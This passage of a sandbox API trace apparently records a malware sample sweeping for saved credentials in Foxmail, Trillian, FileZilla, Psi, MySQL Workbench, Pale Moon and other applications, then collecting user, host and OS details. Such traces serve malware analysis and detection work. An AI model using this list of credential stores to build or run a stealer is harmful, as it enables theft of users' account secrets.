lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore\\Program Files\\Foxmail\\mail\\", nBufferLength=0x105, lpBuffer=0x19ea10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore\\Program Files\\Foxmail\\mail\\", lpFilePart=0x0) returned 0x4c [0184.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19eeb4) returned 1 [0184.041] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore\\Program Files\\Foxmail\\mail\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\virtualstore\\program files\\foxmail\\mail"), fInfoLevelId=0x0, lpFileInformation=0x19ef30 | out: lpFileInformation=0x19ef30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19eeb0) returned 1 [0184.042] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.042] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0184.042] CoTaskMemFree (pv=0x5b20c8) [0184.042] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19e984, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0184.043] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Foxmail\\mail\\", nBufferLength=0x105, lpBuffer=0x19ea10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Foxmail\\mail\\", lpFilePart=0x0) returned 0x52 [0184.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19eeb4) returned 1 [0184.043] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Foxmail\\mail\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\virtualstore\\program files (x86)\\foxmail\\mail"), fInfoLevelId=0x0, lpFileInformation=0x19ef30 | out: lpFileInformation=0x19ef30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19eeb0) returned 1 [0184.045] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Postbox\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Postbox\\profiles.ini", lpFilePart=0x0) returned 0x3a [0184.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0184.045] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Postbox\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\postbox\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0184.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0184.073] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Postbox\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Postbox\\profiles.ini", lpFilePart=0x0) returned 0x3a [0184.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0184.073] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Postbox\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\postbox\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0184.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0184.099] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.099] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0184.099] CoTaskMemFree (pv=0x5b20c8) [0184.099] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19eaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0184.100] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Trillian\\users\\global\\accounts.dat", nBufferLength=0x105, lpBuffer=0x19eb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Trillian\\users\\global\\accounts.dat", lpFilePart=0x0) returned 0x48 [0184.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efe8) returned 1 [0184.100] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Trillian\\users\\global\\accounts.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\trillian\\users\\global\\accounts.dat"), fInfoLevelId=0x0, lpFileInformation=0x19f064 | out: lpFileInformation=0x19f064*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efe4) returned 1 [0184.111] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.111] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x5b20c8, nSize=0x104 | out: lpBuffer="") returned 0x25 [0184.111] CoTaskMemFree (pv=0x5b20c8) [0184.113] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml", nBufferLength=0x105, lpBuffer=0x19ea0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml", lpFilePart=0x0) returned 0x41 [0184.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef44) returned 1 [0184.113] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\filezilla\\recentservers.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0184.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d608) returned 1 [0184.153] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.153] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x5b20c8, nSize=0x104 | out: lpBuffer="") returned 0x25 [0184.153] CoTaskMemFree (pv=0x5b20c8) [0184.154] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.154] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x5b20c8, nSize=0x104 | out: lpBuffer="") returned 0x25 [0184.154] CoTaskMemFree (pv=0x5b20c8) [0184.155] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Psi\\profiles", nBufferLength=0x105, lpBuffer=0x19eb18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Psi\\profiles", lpFilePart=0x0) returned 0x32 [0184.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efbc) returned 1 [0184.155] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Psi\\profiles" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\psi\\profiles"), fInfoLevelId=0x0, lpFileInformation=0x19f038 | out: lpFileInformation=0x19f038*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efb8) returned 1 [0184.156] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Psi+\\profiles", nBufferLength=0x105, lpBuffer=0x19eb18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Psi+\\profiles", lpFilePart=0x0) returned 0x33 [0184.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efbc) returned 1 [0184.156] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Psi+\\profiles" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\psi+\\profiles"), fInfoLevelId=0x0, lpFileInformation=0x19f038 | out: lpFileInformation=0x19f038*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efb8) returned 1 [0184.158] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.158] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0184.158] CoTaskMemFree (pv=0x5b20c8) [0184.158] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x19eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0184.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f070) returned 1 [0184.160] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\UCBrowser\\", nBufferLength=0x105, lpBuffer=0x19eb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\UCBrowser\\", lpFilePart=0x0) returned 0x2e [0184.160] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\UCBrowser\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\ucbrowser\\*"), lpFindFileData=0x19ed98 | out: lpFindFileData=0x19ed98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0184.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f034) returned 1 [0184.199] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\IncrediMail\\Identities", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f044 | out: phkResult=0x19f044*=0x0) returned 0x2 [0184.203] CoTaskMemAlloc (cb=0x20c) returned 0x5b20c8 [0184.203] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5b20c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0184.203] CoTaskMemFree (pv=0x5b20c8) [0184.203] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19eac0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0184.204] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MySQL\\Workbench\\workbench_user_data.dat", nBufferLength=0x105, lpBuffer=0x19eb58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MySQL\\Workbench\\workbench_user_data.dat", lpFilePart=0x0) returned 0x4d [0184.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f000) returned 1 [0184.205] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MySQL\\Workbench\\workbench_user_data.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mysql\\workbench\\workbench_user_data.dat"), fInfoLevelId=0x0, lpFileInformation=0x19f07c | out: lpFileInformation=0x19f07c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19effc) returned 1 [0184.207] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\profiles.ini", lpFilePart=0x0) returned 0x51 [0184.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0184.207] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\netgate technologies\\blackhawk\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0184.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0184.210] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\profiles.ini", lpFilePart=0x0) returned 0x51 [0184.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0184.210] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NETGATE Technologies\\BlackHawk\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\netgate technologies\\blackhawk\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0184.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0184.213] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\profiles.ini", lpFilePart=0x0) returned 0x52 [0184.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0184.213] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\moonchild productions\\pale moon\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0184.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0184.215] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\profiles.ini", nBufferLength=0x105, lpBuffer=0x19e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\profiles.ini", lpFilePart=0x0) returned 0x52 [0184.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef34) returned 1 [0184.215] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\moonchild productions\\pale moon\\profiles.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0184.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f8) returned 1 [0184.242] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19f230 | out: lpTimeZoneInformation=0x19f230) returned 0x2 [0184.270] GetUserNameW (in: lpBuffer=0x19f1ac, pcbBuffer=0x2311588 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x2311588) returned 1 [0184.272] GetComputerNameW (in: lpBuffer=0x19f1ac, nSize=0x2311a20 | out: lpBuffer="XC64ZB", nSize=0x2311a20) returned 1 [0184.300] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e8 [0184.300] SetEvent (hEvent=0x3b4) returned 1 [0184.300] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f32c*=0x4e8, lpdwindex=0x19f14c | out: lpdwindex=0x19f14c) returned 0x0 [0184.301] CoGetContextToken (in: pToken=0x19e164 | out: pToken=0x19e164) returned 0x0 [0184.301] CoGetContextToken (in: pToken=0x19e144 | out: pToken=0x19e144) returned 0x0 [0184.301] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.301] IUnknown:Release (This=0x534da8) returned 0x1 [0184.301] IUnknown:Release (This=0x534da8) returned 0x0 [0184.301] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.301] IUnknown:Release (This=0x54e340) returned 0x1 [0184.301] IUnknown:Release (This=0x54e340) returned 0x0 [0184.301] IUnknown:Release (This=0x54f4e0) returned 0x3 [0184.301] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.302] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.302] IUnknown:Release (This=0x546298) returned 0x1 [0184.302] IUnknown:Release (This=0x546298) returned 0x0 [0184.306] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.306] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.307] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.307] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.307] IUnknown:Release (This=0x585a10) returned 0x0 [0184.307] IUnknown:Release (This=0x585a68) returned 0x0 [0184.307] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.307] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.307] WbemLocator:IUnknown:Release (This=0x5339c8) returned 0x2 [0184.307] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.307] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.307] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.307] IUnknown:Release (This=0x585960) returned 0x0 [0184.307] IUnknown:Release (This=0x585934) returned 0x0 [0184.307] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.307] IUnknown:Release (This=0x589718) returned 0x1 [0184.307] IUnknown:Release (This=0x589718) returned 0x0 [0184.311] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.311] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.311] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.311] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.311] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.311] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.311] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.311] IUnknown:Release (This=0x590b28) returned 0x1 [0184.311] WbemLocator:IUnknown:Release (This=0x5339c8) returned 0x1 [0184.311] WbemLocator:IUnknown:Release (This=0x5339c8) returned 0x0 [0184.312] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.312] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.312] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.312] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.312] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.312] IUnknown:Release (This=0x590b28) returned 0x0 [0184.312] IUnknown:Release (This=0x585ac0) returned 0x0 [0184.312] IUnknown:Release (This=0x585a94) returned 0x0 [0184.313] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.313] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.313] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.313] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.313] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0184.313] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.314] WbemLocator:IUnknown:Release (This=0x546dc8) returned 0x1 [0184.314] WbemLocator:IUnknown:Release (This=0x57d280) returned 0x0 [0184.314] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.314] IUnknown:Release (This=0x57ca60) returned 0x2 [0184.314] IUnknown:Release (This=0x57ca60) returned 0x1 [0184.314] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.314] WbemLocator:IUnknown:Release (This=0x546ec8) returned 0x1 [0184.314] WbemLocator:IUnknown:Release (This=0x57d640) returned 0x0 [0184.314] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.314] IUnknown:Release (This=0x517e90) returned 0x1 [0184.314] IUnknown:Release (This=0x517e90) returned 0x0 [0184.314] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.314] IUnknown:Release (This=0x5766d8) returned 0x1 [0184.314] IUnknown:Release (This=0x5766d8) returned 0x0 [0184.315] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.315] IUnknown:Release (This=0x576ad8) returned 0x1 [0184.315] IUnknown:Release (This=0x576ad8) returned 0x0 [0184.315] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.315] IUnknown:Release (This=0x5b1b68) returned 0x1 [0184.315] IUnknown:Release (This=0x5b1b68) returned 0x0 [0184.315] CoGetContextToken (in: pToken=0x19e0c8 | out: pToken=0x19e0c8) returned 0x0 [0184.315] IUnknown:Release (This=0x576410) returned 0x1 [0184.315] IUnknown:Release (This=0x576410) returned 0x0 [0184.317] CoGetContextToken (in: pToken=0x19f1f8 | out: pToken=0x19f1f8) returned 0x0 [0184.317] CoGetContextToken (in: pToken=0x19f158 | out: pToken=0x19f158) returned 0x0 [0184.317] WbemDefPath:IUnknown:QueryInterface (in: This=0x594350, riid=0x19f228*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f224 | out: ppvObject=0x19f224*=0x594350) returned 0x0 [0184.317] WbemDefPath:IUnknown:AddRef (This=0x594350) returned 0x3 [0184.317] WbemDefPath:IUnknown:Release (This=0x594350) returned 0x2 [0184.317] WbemDefPath:IWbemPath:SetText (This=0x594350, uMode=0x4, pszPath="Win32_OperatingSystem") returned 0x0 [0184.318] WbemDefPath:IWbemPath:GetInfo (in: This=0x594350, uRequestedInfo=0x0, puResponse=0x19f3d8 | out: puResponse=0x19f3d8*=0xc15) returned 0x0 [0184.318] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594350, puCount=0x19f3d0 | out: puCount=0x19f3d0*=0x0) returned 0x0 [0184.319] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f3a8 | out: puCount=0x19f3a8*=0x2) returned 0x0 [0184.319] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f3a4*=0x0, pszText=0x0 | out: puBuffLength=0x19f3a4*=0xf, pszText=0x0) returned 0x0 [0184.319] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f3a4*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3a4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0184.327] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f240*=0x4ec, lpdwindex=0x19f0f4 | out: lpdwindex=0x19f0f4) returned 0x0 [0184.327] CoGetContextToken (in: pToken=0x19e10c | out: pToken=0x19e10c) returned 0x0 [0184.327] CoGetContextToken (in: pToken=0x19e0c4 | out: pToken=0x19e0c4) returned 0x0 [0184.327] WbemLocator:IUnknown:Release (This=0x5b0630) returned 0x1 [0184.327] IUnknown:Release (This=0x599f88) returned 0x0 [0184.338] CoGetContextToken (in: pToken=0x19e10c | out: pToken=0x19e10c) returned 0x0 [0184.338] CoGetContextToken (in: pToken=0x19e0c4 | out: pToken=0x19e0c4) returned 0x0 [0184.338] WbemLocator:IUnknown:Release (This=0x5482c8) returned 0x1 [0184.338] IUnknown:Release (This=0x59a5c8) returned 0x0 [0184.373] CoGetContextToken (in: pToken=0x19f000 | out: pToken=0x19f000) returned 0x0 [0184.373] CoGetContextToken (in: pToken=0x19efa8 | out: pToken=0x19efa8) returned 0x0 [0184.373] IUnknown:QueryInterface (in: This=0x524148, riid=0x6948da0c*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ef84 | out: ppvObject=0x19ef84*=0x524158) returned 0x0 